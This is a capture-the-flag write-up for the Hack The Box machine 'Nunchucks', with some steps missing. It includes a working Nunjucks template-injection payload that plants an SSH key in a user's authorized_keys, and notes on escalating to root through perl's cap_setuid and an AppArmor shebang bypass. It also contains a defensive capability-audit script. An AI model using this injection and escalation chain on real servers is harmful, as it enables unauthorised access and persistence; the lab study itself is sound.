Only 3 ports are open, and we can see the DNS name nunchucks.htb, so add it to /etc/hosts:
echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts
Web
I tried directory brute-forcing but found nothing interesting. There is also a signup page, which is currently closed, so there is not much we can do there. Let's look for vhosts.
Note: if you copy from the original website, don't forget to escape the double quotes.
Now we get the content of /etc/passwd.
Getting User David
I generate an SSH key with ssh-keygen on my local machine.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o. |
| . o. = |
| o . . .=.o |
|+. o . o.+. |
|=E . o =S+ |
|... . *oo.o |
|o.. o B=o. |
|.oo.o o B+.. |
| +oo . .Bo |
+----[SHA256]-----+
Put our SSH public key into /home/david/.ssh/authorized_keys:
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}
And then we can login with ssh.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 8 Nov 05:50:27 UTC 2021
System load: 0.0 Processes: 230
Usage of /: 48.8% of 6.82GB Users logged in: 0
Memory usage: 48% IPv4 address for ens160: 10.10.11.122
Swap usage: 0%
10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$
Privilege Escalation
After some enumeration, there are some interesting files in the /opt directory:
david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$
backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
my $tmpdir = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";
sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}
sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}
if ($> != 0) {
    die "You must run this script as root.\n";
}
printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
This script seems to back up files into the web_backups directory, which is owned by root.
It also uses POSIX::setuid(0) to run as root, but for that to work the interpreter must be SUID or carry a capability.
From the linpeas output, we can see it has CAP_SETUID.
CAP_SETUID is granted to programs running as root, or to those running as a non-root user that have been explicitly given the CAP_SETUID runtime capability. It is often preferable to use Linux runtime capabilities rather than file capabilities, since using file capabilities to run a program with elevated privileges opens up possible security holes: any user with access to the file can exec() that program to gain the elevated privileges.
You can also check with this command: getcap -r / 2>/dev/null
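As an added defender-side check (my own code, not part of the original writeup or the box), the script below does what getcap -r and the linpeas capability section do, but in a form you can drop into an audit job: it decodes the raw security.capability xattr (struct vfs_cap_data) on files, decodes the Cap* lines of /proc/<pid>/status for runtime capabilities, and flags capabilities such as cap_setuid that make a non-root binary root-equivalent. It assumes a Linux host with xattr support; the SAMPLE_XATTR and SAMPLE_STATUS values are constructed to match a binary with cap_setuid+ep and are not taken from the box.

```python
"""Audit Linux capabilities: decode file capabilities (security.capability
xattr) and process capabilities (/proc/<pid>/status), flagging the ones
that give a full root equivalent such as cap_setuid."""
import os
import struct

# Capability bit numbers as defined in linux/capability.h (bit 7 = setuid).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]
# Capabilities that on their own let a process become root or bypass file
# permissions; a non-root binary carrying one of these is effectively setuid.
DANGEROUS = {"setuid", "setgid", "sys_admin", "dac_override",
             "dac_read_search", "sys_ptrace", "sys_module", "setfcap",
             "fowner", "chown"}

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001


def mask_to_names(mask):
    """Turn a capability bitmask into the lower-case names getcap prints."""
    return [f"cap_{CAP_NAMES[i]}" if i < len(CAP_NAMES) else f"cap_{i}"
            for i in range(64) if mask >> i & 1]


def decode_vfs_cap(blob):
    """Decode a raw security.capability xattr value (struct vfs_cap_data).

    Layout, all little-endian u32: magic_etc (revision in the top byte,
    flags in the low byte), then one (rev 1) or two (rev 2/3)
    {permitted, inheritable} pairs, the second pair holding bits 32-63;
    rev 3 appends a rootid (root uid of the owning user namespace).
    """
    (magic,) = struct.unpack_from("<I", blob, 0)
    revision = (magic & VFS_CAP_REVISION_MASK) >> 24
    pairs = 1 if revision == 1 else 2
    permitted = inheritable = 0
    for i in range(pairs):
        p, inh = struct.unpack_from("<II", blob, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    rootid = struct.unpack_from("<I", blob, 4 + 8 * pairs)[0] if revision == 3 else 0
    return {
        "revision": revision,
        "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": mask_to_names(permitted),
        "inheritable": mask_to_names(inheritable),
        "rootid": rootid,
    }


def dangerous_caps(decoded):
    """Permitted capabilities that make the file root-equivalent."""
    return sorted(c for c in decoded["permitted"] if c[4:] in DANGEROUS)


def scan_file_caps(root="/"):
    """Walk `root` like `getcap -r` and return {path: decoded} for every
    file carrying a security.capability xattr; unreadable paths and
    pseudo-filesystems are skipped."""
    found = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except (OSError, AttributeError):
                continue  # no xattr, no permission, or not Linux
            found[path] = decode_vfs_cap(blob)
    return found


def decode_proc_status(status_text):
    """Parse the CapInh/CapPrm/CapEff/CapBnd/CapAmb hex masks of
    /proc/<pid>/status into capability names (runtime capabilities)."""
    caps = {}
    for line in status_text.splitlines():
        if line.startswith("Cap") and ":" in line:
            key, value = line.split(":", 1)
            caps[key] = mask_to_names(int(value.strip(), 16))
    return caps


# Constructed sample: the xattr a binary with cap_setuid+ep would carry
# (revision 2, effective flag set, bit 7 in the low permitted word).
SAMPLE_XATTR = struct.pack("<IIIII", 0x02000001, 1 << 7, 0, 0, 0)
# Constructed sample of the capability lines of /proc/<pid>/status for a
# process holding only cap_setuid in its permitted and effective sets.
SAMPLE_STATUS = ("Name:\tperl\nCapInh:\t0000000000000000\n"
                 "CapPrm:\t0000000000000080\nCapEff:\t0000000000000080\n"
                 "CapBnd:\t000001ffffffffff\n")

if __name__ == "__main__":
    for path, caps in scan_file_caps("/usr").items():
        flag = "  <-- root-equivalent" if dangerous_caps(caps) else ""
        print(f"{path} {','.join(caps['permitted'])}"
              f"{'+ep' if caps['effective'] else '+p'}{flag}")
```

On the box in this writeup the scan would list /usr/bin/perl with cap_setuid and mark it root-equivalent, which is the condition that makes POSIX::setuid(0) in backup.pl succeed for an unprivileged caller; in a hardening review, every flagged entry should either be justified (the binary drops the capability immediately after use) or have the capability removed with setcap -r.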
This is weird. I searched on Google and found an article about this: if a script whose shebang points at the restricted application is used, the script is not given the same restrictions and is executed as shown in the linked article. Knowing that, we can execute scripts via the shebang and the AppArmor profile will not apply to the script. That's it.